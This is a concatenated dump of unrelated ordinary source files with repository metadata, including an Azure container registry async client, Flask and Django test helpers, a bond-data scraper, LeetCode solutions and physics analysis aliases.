def list(self, **kwargs: Any) -> AsyncIterable["_models.Registry"]:
"""Lists all the container registries under the specified subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either Registry or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.containerregistry.v2019_05_01.models.Registry]
:raises ~azure.core.exceptions.HttpResponseError:
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
cls: ClsType[_models.RegistryListResult] = kwargs.pop("cls", None)
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
# make call to next link with the client's api-version
_parsed_next_link = urllib.parse.urlparse(next_link)
_next_request_params = case_insensitive_dict(
{
key: [urllib.parse.quote(v) for v in value]
for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
}
)
_next_request_params["api-version"] = self._config.api_version
request = HttpRequest(
"GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("RegistryListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem) # type: ignore
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(get_next, extract_data)
list.metadata = {"url": "/subscriptions/{subscriptionId}/providers/Microsoft.ContainerRegistry/registries"}
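# Illustrative usage sketch (same assumptions as above):
#
#     async for registry in client.registries.list():
#         print(registry.id)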
@distributed_trace_async
async def list_credentials(
self, resource_group_name: str, registry_name: str, **kwargs: Any
) -> _models.RegistryListCredentialsResult:
"""Lists the login credentials for the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegistryListCredentialsResult or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.RegistryListCredentialsResult
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
cls: ClsType[_models.RegistryListCredentialsResult] = kwargs.pop("cls", None)
request = build_list_credentials_request(
resource_group_name=resource_group_name,
registry_name=registry_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_credentials.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("RegistryListCredentialsResult", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_credentials.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}/listCredentials"
}
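# Illustrative usage sketch (same assumptions as above). The result carries
# the admin username and two rotatable passwords:
#
#     creds = await client.registries.list_credentials("my-rg", "myregistry")
#     print(creds.username, creds.passwords[0].value)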
@overload
async def regenerate_credential(
self,
resource_group_name: str,
registry_name: str,
regenerate_credential_parameters: _models.RegenerateCredentialParameters,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.RegistryListCredentialsResult:
"""Regenerates one of the login credentials for the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param regenerate_credential_parameters: Specifies name of the password which should be
regenerated -- password or password2. Required.
:type regenerate_credential_parameters:
~azure.mgmt.containerregistry.v2019_05_01.models.RegenerateCredentialParameters
:keyword content_type: Body Parameter content-type. Content type parameter for JSON body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegistryListCredentialsResult or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.RegistryListCredentialsResult
:raises ~azure.core.exceptions.HttpResponseError:
"""
@overload
async def regenerate_credential(
self,
resource_group_name: str,
registry_name: str,
regenerate_credential_parameters: IO,
*,
content_type: str = "application/json",
**kwargs: Any
) -> _models.RegistryListCredentialsResult:
"""Regenerates one of the login credentials for the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param regenerate_credential_parameters: Specifies name of the password which should be
regenerated -- password or password2. Required.
:type regenerate_credential_parameters: IO
:keyword content_type: Body Parameter content-type. Content type parameter for binary body.
Default value is "application/json".
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegistryListCredentialsResult or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.RegistryListCredentialsResult
:raises ~azure.core.exceptions.HttpResponseError:
"""
@distributed_trace_async
async def regenerate_credential(
self,
resource_group_name: str,
registry_name: str,
regenerate_credential_parameters: Union[_models.RegenerateCredentialParameters, IO],
**kwargs: Any
) -> _models.RegistryListCredentialsResult:
"""Regenerates one of the login credentials for the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:param regenerate_credential_parameters: Specifies name of the password which should be
regenerated -- password or password2. Is either a model type or an IO type. Required.
:type regenerate_credential_parameters:
~azure.mgmt.containerregistry.v2019_05_01.models.RegenerateCredentialParameters or IO
:keyword content_type: Body Parameter content-type. Known values are: 'application/json'.
Default value is None.
:paramtype content_type: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegistryListCredentialsResult or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.RegistryListCredentialsResult
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
content_type: Optional[str] = kwargs.pop("content_type", _headers.pop("Content-Type", None))
cls: ClsType[_models.RegistryListCredentialsResult] = kwargs.pop("cls", None)
content_type = content_type or "application/json"
_json = None
_content = None
if isinstance(regenerate_credential_parameters, (IO, bytes)):
_content = regenerate_credential_parameters
else:
_json = self._serialize.body(regenerate_credential_parameters, "RegenerateCredentialParameters")
request = build_regenerate_credential_request(
resource_group_name=resource_group_name,
registry_name=registry_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
content_type=content_type,
json=_json,
content=_content,
template_url=self.regenerate_credential.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("RegistryListCredentialsResult", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
regenerate_credential.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}/regenerateCredential"
}
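# Illustrative usage sketch (same assumptions as above); regenerates one of
# the two admin passwords by name ("password" or "password2"):
#
#     creds = await client.registries.regenerate_credential(
#         "my-rg", "myregistry", {"name": "password"}
#     )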
@distributed_trace_async
async def list_usages(
self, resource_group_name: str, registry_name: str, **kwargs: Any
) -> _models.RegistryUsageListResult:
"""Gets the quota usages for the specified container registry.
:param resource_group_name: The name of the resource group to which the container registry
belongs. Required.
:type resource_group_name: str
:param registry_name: The name of the container registry. Required.
:type registry_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: RegistryUsageListResult or the result of cls(response)
:rtype: ~azure.mgmt.containerregistry.v2019_05_01.models.RegistryUsageListResult
:raises ~azure.core.exceptions.HttpResponseError:
"""
error_map = {
401: ClientAuthenticationError,
404: ResourceNotFoundError,
409: ResourceExistsError,
304: ResourceNotModifiedError,
}
error_map.update(kwargs.pop("error_map", {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version: Literal["2019-05-01"] = kwargs.pop("api_version", _params.pop("api-version", "2019-05-01"))
cls: ClsType[_models.RegistryUsageListResult] = kwargs.pop("cls", None)
request = build_list_usages_request(
resource_group_name=resource_group_name,
registry_name=registry_name,
subscription_id=self._config.subscription_id,
api_version=api_version,
template_url=self.list_usages.metadata["url"],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response: PipelineResponse = await self._client._pipeline.run( # pylint: disable=protected-access
request, stream=False, **kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize("RegistryUsageListResult", pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_usages.metadata = {
"url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerRegistry/registries/{registryName}/listUsages"
}
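# Illustrative usage sketch (same assumptions as above):
#
#     usages = await client.registries.list_usages("my-rg", "myregistry")
#     for usage in usages.value:
#         print(usage.name, usage.current_value, usage.limit)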
| [
"[email protected]"
] | |
ba1d47b84928ddee170164408faa078f1f1dd689 | 3d7a3cb5044ad1334353fd06e6c4d8aa0990de89 | /tests/test_templatetags.py | f88ecbfa12a27294518006f9316519055bbfb499 | [
"MIT"
] | permissive | Convious/django-concurrency | ed46faf91e54be58d7ed8e030b764d9537bed240 | 815230336aa173bd73df1f411a77434944958c39 | refs/heads/develop | 2023-05-11T07:10:46.448831 | 2019-08-27T17:29:39 | 2019-08-27T17:29:39 | 225,925,608 | 0 | 0 | MIT | 2023-05-02T05:10:32 | 2019-12-04T17:53:48 | null | UTF-8 | Python | false | false | 679 | py | # -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
import logging
import pytest
from demo.models import SimpleConcurrentModel
from concurrency.templatetags.concurrency import identity, is_version, version
logger = logging.getLogger(__name__)
@pytest.fixture
def obj():
return SimpleConcurrentModel.objects.create()
@pytest.mark.django_db
def test_identity(obj):
assert identity(obj).split(',') == [str(obj.pk), str(obj.version)]
@pytest.mark.django_db
def test_version(obj):
assert version(obj) == obj.version
@pytest.mark.django_db
def test_is_version(obj):
assert is_version(obj._concurrencymeta.field)
| [
"[email protected]"
] | |
9d1001b8abd5c5a9bd0ccdf3d5411d67d97ac9cc | 61a21ed2dcdfe9a43588c5582eea38ce8fdfcbf2 | /akshare/bond/bond_futures.py | 404381fb3be49c7c36c462965ae3ccc93718a333 | [
"MIT"
] | permissive | huanghyw/akshare | 44187c6c56872d499651bb62c178ee837c776388 | ed84e937773c0420cc003793d74b73e64223e08b | refs/heads/master | 2023-04-22T07:06:08.929307 | 2021-05-02T16:05:59 | 2021-05-02T16:05:59 | 319,346,216 | 13 | 5 | MIT | 2021-05-02T16:05:59 | 2020-12-07T14:32:08 | null | UTF-8 | Python | false | false | 1,089 | py | # -*- coding:utf-8 -*-
# /usr/bin/env python
"""
Date: 2020/10/10 13:42
Desc: China treasury bond futures deliverable coupons related indicators
http://www.csindex.com.cn/zh-CN/bond-valuation/bond-futures-deliverable-coupons-related-indicators?date=2020-09-22
"""
import pandas as pd
import requests
def bond_futures_deliverable_coupons(trade_date: str = "2020-09-23") -> pd.DataFrame:
"""
China treasury bond futures deliverable coupons related indicators
http://www.csindex.com.cn/zh-CN/bond-valuation/bond-futures-deliverable-coupons-related-indicators
:param trade_date: trade date, e.g. "2020-09-22"
:type trade_date: str
:return: treasury bond futures deliverable coupons related indicators
:rtype: pandas.DataFrame
:rtype: pandas.DataFrame
"""
url = "http://www.csindex.com.cn/zh-CN/bond-valuation/bond-futures-deliverable-coupons-related-indicators"
params = {
"date": trade_date
}
r = requests.get(url, params=params)
temp_df = pd.read_html(r.text)[0]
return temp_df
if __name__ == '__main__':
bond_futures_deliverable_coupons_df = bond_futures_deliverable_coupons(trade_date="2020-09-22")
print(bond_futures_deliverable_coupons_df)
| [
"[email protected]"
] | |
99f34fa74eaf2e0f18522bb675fe078774e0b38b | ebfcae1c5ba2997b2ac4471d5bedc3f5daffcb31 | /repos/simpleapi-master/example_project/client/python/flask/testclient.py | 467379407d15db6ef518a0bf3549f60eed722cb8 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | babiato/flaskapp1 | 84de2d0b26a54f5820d3bbe97926782ad41e005c | 530beb9e3b8516e0e93960b99521c23a523ef546 | refs/heads/master | 2023-02-26T16:36:49.760632 | 2021-02-04T09:08:40 | 2021-02-04T09:08:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 273 | py | # -*- coding: utf-8 -*-
import sys
sys.path.append("../../../../")
from simpleapi.client import Client, RemoteException
calculator = Client(ns='http://localhost:5000/api/',
transport_type='xml', timeout=60)
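# Illustrative (hypothetical) error handling built on the RemoteException
# import above; the failing call below is made up for demonstration:
# try:
#     calculator.add(a=5)  # missing required argument
# except RemoteException, e:
#     print "remote call failed:", e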
print "5 + 5 =", calculator.add(a=5, b=16) | [
"[email protected]"
] | |
74db1bd87aa3d7a2b8f7237fe22f7e0d6381601d | f1d9df04036fc43c9e5cc7998b83261f4daa94b8 | /tests/base_test_case.py | 618b5e7cad75c6d2d82d4d926a30004158dacbc8 | [] | no_license | Eaterator/web | 019eb6547995be30b3468e5c44ecc52f05858fb4 | 9c598607f76ad770c66d85c47ffcec05f92f4d66 | refs/heads/master | 2021-01-09T20:30:13.417308 | 2017-04-25T02:44:35 | 2017-04-25T02:44:35 | 81,286,177 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,825 | py | from datetime import datetime
import json
import random
from application.app import create_app
from application.auth.models import Role, User
from application.auth.auth_utilities import PasswordUtilities, ACCESS_TOKEN_HEADER
from application.recipe.models import Ingredient, IngredientRecipe, Recipe
from application.auth.roles import ROLES
random.seed(1000)
class BaseTempDBTestCase:
"""
Provides helper methods that build a fresh database instance between tests and populate the
data the tests need, so they run against realistic responses (as in production) rather than mocks.
"""
def setUpDB(self):
from tests.tsting_config import SQLALCHEMY_DATABASE_URI
from application import config
config.SQLALCHEMY_DATABASE_URI = SQLALCHEMY_DATABASE_URI
self.app = create_app(app_config=config)
from application.base_models import db
self.db = db
with self.app.app_context():
self.db.session.remove()
self.db.session.close()
self.db.drop_all()
self.db.create_all()
self.roles = self.ingredients = self.recipes = None
self.test_client = self.app.test_client()
def create_recipes(self):
self.recipes = []
with self.app.app_context():
for recipe in RECIPES:
new_recipe = Recipe(**recipe)
self.db.session.add(new_recipe)
self.recipes.append(new_recipe)
self.db.session.commit()
def create_ingredients(self):
with self.app.app_context():
self.ingredients = []
for ingredient in INGREDIENTS:
new_ingredient = Ingredient(name=ingredient)
self.db.session.add(new_ingredient)
self.ingredients.append(new_ingredient)
self.db.session.commit()
def create_recipe_ingredients(self):
with self.app.app_context():
num_ingredients = 0
for recipe in self.recipes:
if num_ingredients < 5:
num_ingredients += 1
for ingredient in random.sample(self.ingredients, num_ingredients):
new_ingredient_recipe = IngredientRecipe(
ingredient=ingredient.pk,
recipe=recipe.pk
)
self.db.session.add(new_ingredient_recipe)
self.db.session.commit()
def create_roles(self):
with self.app.app_context():
self.roles = {}
for role in ROLES:
self.roles[role["name"]] = Role(**role)
self.db.session.add(self.roles[role["name"]])
self.db.session.commit()
def create_user(self, user_payload, role):
with self.app.app_context():
user = User(**user_payload)
user.password = PasswordUtilities.generate_password(user.password)
user.role = role.pk
self.db.session.add(user)
self.db.session.commit()
def create_regular_user(self):
with self.app.app_context():
if not self.roles:
self.create_roles()
self.create_user(TEST_REGULAR_USER, self.roles["regular"])
return TEST_REGULAR_USER
def create_business_user(self):
with self.app.app_context():
if not self.roles:
self.create_roles()
self.create_user(TEST_BUSINESS_USER, self.roles['corporate'])
return TEST_BUSINESS_USER
def create_admin_user(self):
with self.app.app_context():
if not self.roles:
self.create_roles()
self.create_user(TEST_ADMIN_USER, self.roles['admin'])
return TEST_ADMIN_USER
def get_jwt_token(self, user):
resp = self.test_client.post('/auth/',
data=json.dumps({
"username": user["username"],
"password": user["password"]
}),
content_type="application/json"
)
return json.loads(resp.data.decode('utf-8')).get(ACCESS_TOKEN_HEADER), resp
def tearDownDB(self):
with self.app.app_context():
self.db.session.remove()
self.db.session.close()
self.db.drop_all()
INGREDIENTS = ["chicken", "potato", "pepper", "onion", "carrot", "celery", "beef", "pork"]
RECIPES = [
{"title": "chicken with onions"},
{"title": "chicken with peppers"},
{"title": "chicken with potato"},
{"title": "chicken with potato and peppers"},
{"title": "onion with peppers and onion"},
{"title": "peppers with potato and onion"},
{"title": "chicken with onions"},
{"title": "chicken with peppers"},
{"title": "chicken with potato"},
{"title": "chicken with potato and peppers"},
{"title": "onion with peppers and onion"},
{"title": "peppers with potato and onion"},
]
TEST_REGISTER_USER_PAYLOAD = dict(
username="[email protected]",
password="TestUser123!",
confirm="TestUser123!",
first_name="test",
last_name="user",
date_of_birth=datetime(1991, 1, 1)
)
TEST_REGULAR_USER = dict(
username="[email protected]",
password="TestUser123!",
first_name="test",
last_name="user",
date_of_birth=datetime(1991, 1, 1)
)
TEST_BUSINESS_USER = dict(
username="[email protected]",
password="TestUser123!",
first_name="test",
last_name="user",
date_of_birth=datetime(1991, 1, 1)
)
TEST_ADMIN_USER = dict(
username="[email protected]",
password="TestUser123!",
first_name="test",
last_name="user",
date_of_birth=datetime(1991, 1, 1)
)
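# Illustrative sketch (not part of the original suite): one way to wire the
# helper into a unittest.TestCase. The class and test below are hypothetical.
import unittest


class ExampleAuthTestCase(BaseTempDBTestCase, unittest.TestCase):

    def setUp(self):
        self.setUpDB()

    def tearDown(self):
        self.tearDownDB()

    def test_regular_user_can_authenticate(self):
        user = self.create_regular_user()
        token, resp = self.get_jwt_token(user)
        self.assertEqual(resp.status_code, 200)
        self.assertTrue(token)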
| [
"[email protected]"
] | |
c40a4d51b0c5e6ad6b99005c2341a3eccd0a3b90 | 75dcb56e318688499bdab789262839e7f58bd4f6 | /_algorithms_challenges/leetcode/LeetCode/111 Minimum Depth of Binary Tree.py | f77921ed53bd989cfd4ee577d98dec3b06404713 | [] | no_license | syurskyi/Algorithms_and_Data_Structure | 9a1f358577e51e89c862d0f93f373b7f20ddd261 | 929dde1723fb2f54870c8a9badc80fc23e8400d3 | refs/heads/master | 2023-02-22T17:55:55.453535 | 2022-12-23T03:15:00 | 2022-12-23T03:15:00 | 226,243,987 | 4 | 1 | null | 2023-02-07T21:01:45 | 2019-12-06T04:14:10 | Jupyter Notebook | UTF-8 | Python | false | false | 875 | py | """
Given a binary tree, find its minimum depth.
The minimum depth is the number of nodes along the shortest path from the root node down to the nearest leaf node.
"""
__author__ = 'Danyang'
class TreeNode(object):
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution(object):
def minDepth(self, root):
"""
:param root: TreeNode
:return: integer
"""
return self.fathom(root, 0)
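    # Quick illustrative check (not from the original file):
    #     root = TreeNode(1)
    #     root.left = TreeNode(2)
    #     Solution().minDepth(root)  # -> 2; the nearest leaf is the left child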
def fathom(self, root, depth):
"""
DFS; recurse only into children that exist, so a node with a single child is not mistaken for a leaf
"""
if not root: return depth
elif root.right and not root.left: return self.fathom(root.right, depth+1)
elif root.left and not root.right: return self.fathom(root.left, depth+1)
else: return min(self.fathom(root.left, depth+1),
self.fathom(root.right, depth+1)) | [
"[email protected]"
] | |
efd5603bda7dcc385b754567a05f493a43bc8d0b | ed48e992ad5fbb579afae6d0f7e6df775f8d306e | /lib/util.py | d5df4f598dd4accf11d107af1830400849d1696e | [] | no_license | sterlingbaldwin/e3sm_to_cmip | 6a23b92145c042af16979ff67b17555c3a9222e8 | bc5bcfaad5901eb6f07ab450eeab20144f4029cb | refs/heads/master | 2020-03-12T12:08:30.743456 | 2018-04-25T23:27:47 | 2018-04-25T23:27:47 | 130,611,295 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | import sys
import traceback
def format_debug(e):
"""
Return a string of an exception's relevant information
"""
_, _, tb = sys.exc_info()
return """
1: {doc}
2: {exec_info}
3: {exec_0}
4: {exec_1}
5: {lineno}
6: {stack}
""".format(
doc=e.__doc__,
exec_info=sys.exc_info(),
exec_0=sys.exc_info()[0],
exec_1=sys.exc_info()[1],
lineno=traceback.tb_lineno(sys.exc_info()[2]),
stack=traceback.print_tb(tb)) | [
"[email protected]"
] | |
f8108f1761c2e56a4f7449a8e629de145543dded | e3f5f41b242650b4bef68aa191a5779aedd3e02e | /Chapter03/config.py | d12aeca3649c2d96b68e8b32d23a06c74a03f285 | [
"MIT"
] | permissive | PacktPublishing/Mastering-Flask-Web-Development-Second-Edition | d4675c047bb51b0154958205f53c962ab4d32e4c | c3174127b40f8af1e2ab5e614994ffed7acbc11b | refs/heads/master | 2023-05-11T00:23:30.213655 | 2023-01-18T09:14:14 | 2023-01-18T09:14:14 | 154,667,293 | 168 | 131 | MIT | 2023-05-01T20:52:13 | 2018-10-25T12:30:58 | Python | UTF-8 | Python | false | false | 483 | py | class Config(object):
POSTS_PER_PAGE = 10
class ProdConfig(Config):
SECRET_KEY = '\xcb\xd7\x8a.\x82\x9c1Lu\xf1&2\xf6i\xfa\x8e\xb1\xc9t^\xccW\xdbw'
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_DATABASE_URI = 'sqlite:///database.db'
class DevConfig(Config):
DEBUG = True
SECRET_KEY = '\xa8\xcc\xeaP+\xb3\xe8 |\xad\xdb\xea\xd0\xd4\xe8\xac\xee\xfaW\x072@O3'
SQLALCHEMY_TRACK_MODIFICATIONS = True
SQLALCHEMY_DATABASE_URI = 'sqlite:///database.db'
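# Illustrative usage (assumption: the app factory lives elsewhere in the
# chapter's code):
#
#     from flask import Flask
#     app = Flask(__name__)
#     app.config.from_object(DevConfig)
#     app.config["POSTS_PER_PAGE"]  # -> 10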
| [
"[email protected]"
] | |
ccf8ee337ea275a691e6d35ae32738e200fead01 | afc8d5a9b1c2dd476ea59a7211b455732806fdfd | /Configurations/ZH3l/STXS_nanoAOD/v5/Full2018nano_STXS_1p1/aliases.py | 303e9601b0371fd3ca5cf4bb282c6e5665853816 | [] | no_license | latinos/PlotsConfigurations | 6d88a5ad828dde4a7f45c68765081ed182fcda21 | 02417839021e2112e740607b0fb78e09b58c930f | refs/heads/master | 2023-08-18T20:39:31.954943 | 2023-08-18T09:23:34 | 2023-08-18T09:23:34 | 39,819,875 | 10 | 63 | null | 2023-08-10T14:08:04 | 2015-07-28T07:36:50 | Python | UTF-8 | Python | false | false | 2,914 | py | #Aliases (mostly btag)
mc = [skey for skey in samples if skey not in ('Fake', 'DATA')]
#2017
#bWP = '0.1522' #Loose
bWP = '0.4941'
aliases['bVeto'] = {
'expr': '(Sum$( CleanJet_pt > 20.0 && Jet_btagDeepB[CleanJet_jetIdx] > '+bWP+' ) == 0)'
}
aliases['dphilmet_mme'] = {
'expr': '( (abs(PuppiMET_phi-Lepton_phi[]) > 3.14159)*(abs(PuppiMET_phi-Lepton_phi[]) - 3.14159) + (abs(PuppiMET_phi-Lepton_phi[]) < 3.14159)*abs(PuppiMET_phi-Lepton_phi[]))*(abs(Lepton_pdgId[]) == 11 && abs(Lepton_pdgId[0] * Lepton_pdgId[1] * Lepton_pdgId[2]) == 13*13*11) + -999*(abs(Lepton_pdgId[]) != 11 || abs(Lepton_pdgId[0] * Lepton_pdgId[1] * Lepton_pdgId[2]) != 13*13*11)'
}
aliases['pt_e_mme'] = {
'expr': '(Lepton_pt[])*(abs(Lepton_pdgId[]) == 11 && abs(Lepton_pdgId[0] * Lepton_pdgId[1] * Lepton_pdgId[2]) == 13*13*11) + -999*(abs(Lepton_pdgId[]) != 11 || abs(Lepton_pdgId[0] * Lepton_pdgId[1] * Lepton_pdgId[2]) != 13*13*11)'
}
# Temporary patch for BTV postprocessor bug (no SF for eta < 0, <= 102X_nAODv5_Full2018v5)
#2017
btagSFSource = '%s/src/PhysicsTools/NanoAODTools/data/btagSF/DeepCSV_94XSF_V2_B_F.csv' % os.getenv('CMSSW_BASE')
aliases['Jet_btagSF_shapeFix'] = {
'linesToAdd': [
'gSystem->Load("libCondFormatsBTauObjects.so");',
'gSystem->Load("libCondToolsBTau.so");',
'gSystem->AddIncludePath("-I%s/src");' % os.getenv('CMSSW_RELEASE_BASE'),
'.L %s/src/PlotsConfigurations/Configurations/patches/btagsfpatch.cc+' % os.getenv('CMSSW_BASE')
],
'class': 'BtagSF',
'args': (btagSFSource,),
'samples': mc
}
aliases['btagSF'] = {
'expr': '( TMath::Exp(Sum$( TMath::Log( (CleanJet_pt>20 && abs(CleanJet_eta)<2.5)*Jet_btagSF_shapeFix[CleanJet_jetIdx]+1*(CleanJet_pt<20 || abs(CleanJet_eta)>2.5) ) ) ) )',
'samples': mc
}
systs = ['jes','lf','hf','lfstats1','lfstats2','hfstats1','hfstats2','cferr1','cferr2']
for s in systs:
aliases['Jet_btagSF_shapeFix_up_%s' % s] = {
'class': 'BtagSF',
'args': (btagSFSource, 'up_' + s),
'samples': mc
}
aliases['Jet_btagSF_shapeFix_down_%s' % s] = {
'class': 'BtagSF',
'args': (btagSFSource, 'down_' + s),
'samples': mc
}
aliases['btagSF'+s+'up'] = {
'expr': aliases['btagSF']['expr'].replace('shapeFix','shapeFix_up_'+s),
'samples':mc
}
aliases['btagSF'+s+'down'] = {
'expr': aliases['btagSF']['expr'].replace('shapeFix','shapeFix_down_'+s),
'samples':mc
}
aliases['EleWPTight'] = {
'expr' : '(abs(Lepton_pdgId[0])==13 || Electron_cutBased[Lepton_electronIdx[0]]>=4) \
&& (abs(Lepton_pdgId[1])==13 || Electron_cutBased[Lepton_electronIdx[1]]>=4) \
&& (abs(Lepton_pdgId[2])==13 || Electron_cutBased[Lepton_electronIdx[2]]>=4)',
}
aliases['genZPt'] = {
'expr': 'Sum$(GenPart_pt*(abs(GenPart_pdgId)==23&&((GenPart_statusFlags&8192)==8192)))',
'samples' : mc
}
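# Illustrative note (framework-dependent assumption): cut and variable
# definitions elsewhere in these configurations can reference the alias names
# above directly, e.g. a selection string such as
#     'bVeto && EleWPTight'
# which the shape-making machinery expands using the 'expr' strings.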
| [
"[email protected]"
] | |
0f549c7b98395f5a504787ed41be7b2cb7f15398 | 3d5bcd57b893c95bbcbfafe77bbc33c65432c9ed | /Algorithms/LeetCode/L1268suggestedProducts.py | 6022d3b1d95efdd64998c9ee172cc452f33506fb | [] | no_license | arunachalamev/PythonProgramming | c160f34c7cb90e82cd0d4762ff9dcb4abadf9c1c | ea188aaa1b72511aeb769a2829055d0aae55e73e | refs/heads/master | 2021-06-04T03:50:37.976293 | 2020-11-12T19:52:28 | 2020-11-12T19:52:28 | 97,364,002 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,009 | py | # Given an array of strings products and a string searchWord. We want to design a system that suggests
# at most three product names from products after each character of searchWord is typed.
# Suggested products should have common prefix with the searchWord. If there are more than three products
# with a common prefix, return the three lexicographically smallest products.
# Return a list of lists of the suggested products after each character of searchWord is typed.
def suggestedProducts(products,searchWord):
products.sort()
temp = ""
output = list()
for char in searchWord:
temp = temp + char
result = [k for k in products if k.startswith(temp)]
if len(result) > 3:
output.append(result[:3])
else:
output.append(result)
return output
print (suggestedProducts(["mobile","mouse","moneypot","monitor","mousepad"],"mouse"))
print (suggestedProducts(["havana"],"havana"))
print (suggestedProducts(["havana"],"titanic"))
| [
"[email protected]"
] | |
a3a3f127f0d5d5d6cd29ffc6073cb8100e216345 | 976f270299c39d9c1c20a3ac3022ac1a32fc2f68 | /project/helper.py | d4455cd0799708cf80401e7ac4100741675059e2 | [
"Apache-2.0"
] | permissive | yazici/starthinker | 958bfe35e4a8a422c7f4146c8eb36de05c2e6761 | bdbac52ee57add39f71c37e599fbf5eb03782e20 | refs/heads/master | 2020-04-29T21:23:36.852893 | 2019-03-11T07:31:24 | 2019-03-11T07:31:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,488 | py | ###########################################################################
#
# Copyright 2018 Google Inc.
#
